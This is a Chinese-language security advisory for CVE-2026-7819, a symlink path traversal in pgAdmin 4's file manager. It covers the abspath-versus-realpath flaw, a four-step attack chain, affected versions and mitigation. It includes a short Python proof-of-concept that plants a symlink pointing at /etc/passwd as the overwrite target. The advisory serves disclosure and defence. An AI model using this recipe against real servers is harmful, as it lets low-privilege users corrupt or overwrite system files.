CVE-2026-7819 pgAdmin 4 符号链接路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-7819

漏洞类型

符号链接路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

pgAdmin 4

漏洞概述

pgAdmin 4 文件管理器存在符号链接路径遍历漏洞。由于权限检查函数使用 os.path.abspath 而非 os.path.realpath，无法解析符号链接，而后续写入操作会跟随符号链接。经过身份验证的低权限用户可利用此漏洞，在自身存储目录中植入指向系统任意路径的符号链接，诱导 pgAdmin 写入数据，从而导致文件被篡改或破坏。

技术细节

该漏洞源于 TOCTOU（检查时与使用时）逻辑缺陷及路径解析函数使用不当。pgAdmin 4 的 check_access_permission 使用 os.path.abspath 验证路径，该函数仅规范 '..' 但不解析符号链接。攻击者首先在允许的存储目录下创建指向敏感文件（如 /etc/passwd）的符号链接。当验证通过后，程序执行文件写入操作，内核会跟随该符号链接，导致内容被写入到攻击者指定的任意位置。修复方案将检查逻辑改为 os.path.realpath，并在打开文件时使用 O_NOFOLLOW 标志，强制关闭叶子组件的 TOCTOU 窗口，防止跟随符号链接。

攻击链分析

STEP 1

1. 身份认证

攻击者需要拥有 pgAdmin 4 的合法用户账户并登录。

STEP 2

2. 创建符号链接

攻击者在自己的存储目录内创建一个符号链接，该链接指向系统中的任意路径（如配置文件或系统二进制文件）。

STEP 3

3. 触发写入操作

攻击者通过文件管理器上传文件或执行写入操作，文件名为创建的符号链接名称。

STEP 4

4. 权限绕过与写入

pgAdmin 的权限检查（使用 os.path.abspath）认为路径合法，但随后的内核写入操作跟随符号链接，导致数据被写入到攻击者指定的目标路径。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-7819
# This script demonstrates the creation of a malicious symlink.

import os

# Configuration
USER_STORAGE_DIR = "/var/lib/pgadmin/storage/user_uuid/"
TARGET_PATH = "/etc/passwd"  # The target file to overwrite
SYMLINK_NAME = "exploit_link"

# Step 1: Create the symbolic link inside the user's storage
full_link_path = os.path.join(USER_STORAGE_DIR, SYMLINK_NAME)

try:
    # Create symlink pointing outside the storage directory
    os.symlink(TARGET_PATH, full_link_path)
    print(f"[+] Symlink created: {full_link_path} -> {TARGET_PATH}")
except Exception as e:
    print(f"[-] Failed to create symlink: {e}")

# Step 2: Trigger the upload/write via pgAdmin API
# Using the filename 'exploit_link'. The check_access_permission will pass
# because it resolves to an absolute path inside the storage dir.
# However, the actual write will follow the symlink to /etc/passwd.
print("[*] Now trigger a file upload via the web interface targeting 'exploit_link'")

影响范围

pgAdmin 4 < 9.15

防御指南

临时缓解措施

建议立即将 pgAdmin 4 升级至 9.15 或更高版本。如果暂时无法升级，应严格限制对 pgAdmin 服务的网络访问，仅允许可信内网访问，并加强对文件上传和存储目录的监控，及时发现异常的符号链接创建行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7819
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7819
3 Details https://www.cvedetails.com/cve/CVE-2026-7819/
4 VulDB https://vuldb.com/cve/CVE-2026-7819
5 Link https://github.com/pgadmin-org/pgadmin4/issues/9902